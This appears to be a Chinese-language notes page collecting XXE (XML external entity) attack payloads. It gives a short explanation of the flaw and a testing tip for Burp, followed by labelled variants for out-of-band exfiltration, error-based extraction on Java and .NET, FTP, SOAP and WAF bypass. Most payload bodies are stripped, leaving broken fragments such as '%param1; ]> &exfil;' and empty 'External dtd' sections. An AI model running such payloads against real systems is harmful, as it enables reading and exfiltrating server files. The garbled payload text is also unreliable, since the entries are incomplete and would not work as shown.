XXE payload

一、漏洞原理

当xml可以控制，并且后端没有过滤时就存在XXE漏洞。xml解析是引用外部实体。

二、漏洞测试

平时burp 抓包 可以在请求头添加  Content-type:application/xml
并添加 xml语句如果报错 或执行则有可能存在xxe漏洞，不断根据response fuzz即可

三、XXE payload

网上收集的payload

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------




]>
&sp;

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------




%sp;
%param1;
]>
&exfil;

## External dtd: ##


">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------



%sp;
%param1;
%exfil;
]>

## External dtd: ##


">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------




%sp;
%param3;
%exfil;
]>

## External dtd: ##
">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------



%sp;
%param3;
%exfil;
]>

## External dtd: ##

'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------



 
">

%dtd;
]>
&all;
 
## External dtd: ##
 


------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------



  %one;
  %two;
  %four;
]>

## External dtd: ##


">

-------------------------^ you might need to encode this % (depends on your target) as: %

--------------
FTP
--------------


%asd;
%c;
]>
&rrr;


## External dtd ##

">

---------------------------
Inside SOAP body
---------------------------
 %dtd;]>]]>


---------------------------
Untested - WAF Bypass
---------------------------